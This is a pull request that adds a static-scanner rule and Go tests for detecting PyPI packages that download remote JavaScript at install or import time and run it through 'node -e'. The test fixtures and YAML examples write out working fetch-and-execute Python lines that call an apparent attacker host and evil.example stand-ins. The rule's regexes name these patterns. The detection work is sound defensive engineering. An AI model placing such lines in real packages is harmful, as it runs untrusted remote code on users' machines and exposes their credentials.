### PR TITLE
feat(scan): detect PyPI import-time remote JavaScript execution

### DIFF
--- a/internal/engine/pattern/matcher_test.go
+++ b/internal/engine/pattern/matcher_test.go
@@ -539,3 +539,74 @@ func testBuiltinFS(tb testing.TB) embed.FS {
 	tb.Helper()
 	return builtin.FS()
 }
+
+// fullBuiltinMatcher loads + compiles every built-in rule into a real
+// Matcher (prefilter included), for end-to-end target/signal tests.
+func fullBuiltinMatcher(t *testing.T) *pattern.Matcher {
+	t.Helper()
+	raw, err := rules.LoadFromFS(builtin.FS())
+	require.NoError(t, err)
+	compiled, errs := rules.CompileAll(raw)
+	require.Empty(t, errs)
+	return pattern.NewMatcher(compiled)
+}
+
+func pyImportTimeRemoteJSFires(t *testing.T, m *pattern.Matcher, relPath, content string) bool {
+	t.Helper()
+	findings, err := m.Analyze(context.Background(), &scanner.Target{RelPath: relPath, Content: []byte(content)})
+	require.NoError(t, err)
+	for _, f := range findings {
+		if f.RuleID == "PY_IMPORTTIME_REMOTE_JS_001" {
+			return true
+		}
+	}
+	return false
+}
+
+// TestPyImportTimeRemoteJS_TargetPrecision: the rule fires only in
+// import/setup-time files (setup.py, __init__.py). The identical payload
+// in a regular module or in docs must NOT fire -- that file-context
+// restriction is how "import-time execution context" is enforced.
+func TestPyImportTimeRemoteJS_TargetPrecision(t *testing.T) {
+	m := fullBuiltinMatcher(t)
+	payload := "import urllib.request, subprocess\n" +
+		"js = urllib.request.urlopen('https://ddjidd564.github.io/x.js').read().decode()\n" +
+		"subprocess.run(['node', '-e', js])\n"
+
+	require.True(t, pyImportTimeRemoteJSFires(t, m, "pkg/__init__.py", payload), "should fire in __init__.py")
+	require.True(t, pyImportTimeRemoteJSFires(t, m, "setup.py", payload), "should fire in setup.py")
+	require.False(t, pyImportTimeRemoteJSFires(t, m, "pkg/util.py", payload), "must not fire in a regular module (not import-time context)")
+	require.False(t, pyImportTimeRemoteJSFires(t, m, "README.md", payload), "must not fire in documentation")
+}
+
+// TestPyImportTimeRemoteJS_RequiresAllThreeSignals: in an import-time
+// file, any single missing signal (remote fetch / Node execution /
+// JavaScript payload reference) means no finding. This is what keeps
+// ordinary packages that merely fetch config or run a local node build
+// from tripping the rule.
+func TestPyImportTimeRemoteJS_RequiresAllThreeSignals(t *testing.T) {
+	m := fullBuiltinMatcher(t)
+	cases := []struct {
+		name    string
+		content string
+	}{
+		{"fetch + node, no JS payload", "import requests, subprocess\nx = requests.get('https://e/data').text\nsubprocess.run(['node', '-e', x])\n"},
+		{"fetch + JS, no node execution", "import requests\njs = requests.get('https://e/x.js').text  # fetched but never run\n"},
+		{"node + JS, no remote fetch (local build)", "import subprocess\nsubprocess.run(['node', 'build.js'])\n"},
+		// Fetches a .js asset AND runs node, but node runs a local FILE
+		// (no -e), so it never executes the fetched payload. Requiring
+		// the eval form (node -e / --eval) keeps this from false-firing.
+		{"fetch .js + local node build (node runs a file, not -e)", "import requests, subprocess\njs = requests.get('https://cdn.example/foo.js').text\nsubprocess.run(['node', 'scripts/build.js'])\n"},
+		// Signals scattered on unrelated lines: fetch a config.json,
+		// a local inline node -e build, and a .js listed in package_data.
+		// None of these is a remote-JS execution, and binding the fetch
+		// to a .js URL keeps it from firing.
+		{"unrelated signals: config fetch + local node -e + package_data .js", "import requests, subprocess\ncfg = requests.get('https://cdn.example/config.json').json()\nsubprocess.run(['node', '-e', 'console.log(1)'])\nDATA = {'pkg': ['static/app.js']}\n"},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			require.False(t, pyImportTimeRemoteJSFires(t, m, "setup.py", tc.content),
+				"a missing signal must not produce a finding")
+		})
+	}
+}

--- a/internal/rules/builtin/supply-chain.yaml
+++ b/internal/rules/builtin/supply-chain.yaml
@@ -617,3 +617,34 @@ examples:
     - "Tasks list with run options"
     - "const dir = path.join('claude', 'settings.json'); // not the hidden dir"
     - "path.join('.claude', 'hookspad') // typo, not the hooks/ path"
+---
+id: PY_IMPORTTIME_REMOTE_JS_001
+name: "PyPI import-time remote JavaScript execution"
+description: "Detects a Python package that, at install or import time (setup.py / __init__.py), downloads remote JavaScript and runs it through Node. This is the TrapDoor-style PyPI payload: an import-time fetch of attacker-hosted .js executed via node -e. Requires all three signals (remote retrieval + Node execution + a JavaScript payload reference) so packages that merely mention Node or JavaScript do not trip it."
+severity: CRITICAL
+category: supply-chain
+targets: ["setup.py", "__init__.py"]
+match_mode: all
+remediation: "Remove the remote fetch and Node execution from package import/setup code. Packages must never download and run remote code at install or import time. Audit the host for credential exposure and rotate any tokens reachable from the build or import environment."
+patterns:
+  # (1) Remote retrieval bound to a JavaScript payload: a fetch call
+  # whose argument is a .js URL (optionally with query/fragment) or the
+  # campaign host. Binding the .js to the fetch call in one pattern
+  # means an unrelated `.js` string elsewhere in the file (package_data,
+  # a fetched config.json) does not satisfy this signal.
+  - type: regex
+    value: "(?i)(requests\\.get|httpx\\.get|urllib\\.request\\.urlopen|urllib\\.request\\.urlretrieve|aiohttp\\.[a-z_]+|\\burlopen|\\burlretrieve)\\s*\\([^)]*(\\.js[\"'?#)]|ddjidd564\\.github\\.io|defi-security-best-practices)"
+  # (2) Node EVAL of a payload (node -e / --eval, shell or argv form).
+  # The eval form is required so a local `node build.js` does not count.
+  - type: regex
+    value: "(?i)(node\\s+(-e|--eval)\\b|[\"']node[\"']\\s*,\\s*[\"'](-e|--eval)[\"'])"
+examples:
+  true_positive:
+    - "import urllib.request, subprocess; js = urllib.request.urlopen('https://ddjidd564.github.io/defi-security-best-practices/x.js').read().decode(); subprocess.run(['node', '-e', js])"
+    - "import requests, os; payload = requests.get('https://evil.example/risk-profiler.js').text; os.system('node -e ' + payload)"
+    - "import requests, subprocess; js = requests.get('https://evil.example/p.js?v=2').text; subprocess.run(['node', '--eval', js])"
+  false_positive:
+    - "cfg = requests.get('https://example.com/config.json').json()  # config only, no execution"
+    - "subprocess.run(['node', 'scripts/build.js'])  # local build, no remote fetch"
+    - "js = requests.get('https://cdn.example/foo.js').text; subprocess.run(['node', 'scripts/build.js'])  # fetched asset, but node runs a local file, not -e the payload"
+    - "# Optional: pipe results.js through node -e after you download it yourself"


### PR DESCRIPTION
## What

Adds `PY_IMPORTTIME_REMOTE_JS_001` (supply-chain, CRITICAL): the TrapDoor-style PyPI payload that fetches and runs remote JavaScript at install or import time.

## Detection contract

- Detects **setup/import-time Python code** (targets: `setup.py`, `__init__.py`) that **retrieves a remote `.js` payload** (a fetch call whose argument is a `.js` URL, with optional `?query`/`#fragment`, or the campaign host) **and invokes Node via `node -e` / `node --eval`**. `match_mode: all`, so both must be present.
- **Does not execute package code** — purely static pattern matching on file contents.
- **Does not prove full data flow** between the fetched buffer and the evaluated code (a regex rule cannot). A file that both fetches a remote `.js` and, unrelatedly, runs `node -e` would still flag. Analyzer-level fetch→eval binding is tracked as a follow-up.
- **Concrete false positives from review are covered by regression tests**: a fetched `config.json` (not `.js`), a local `node build.js` (no `-e`), a `.js` listed in `package_data`, and docs mentioning `node -e` all do NOT fire.

## Verification

- Rule self-test + through-matcher self-test (positive path, including a cache-busting `?query` URL and `--eval`); target-precision (the same payload in a regular module or README does not fire); all-three-signals, including the `config.json` + local `node -e` + `package_data` `.js` scenario.
- Offline Docker smoke: `ghcr.io/garagon/aguara:0.18.4` → 0 findings; this branch → 1 CRITICAL on `setup.py`; the benign `config.json`-fetch + local-build `setup.py` → 0.

## Scope

One rule plus two test additions. No analyzer, no other rules, no version bump.
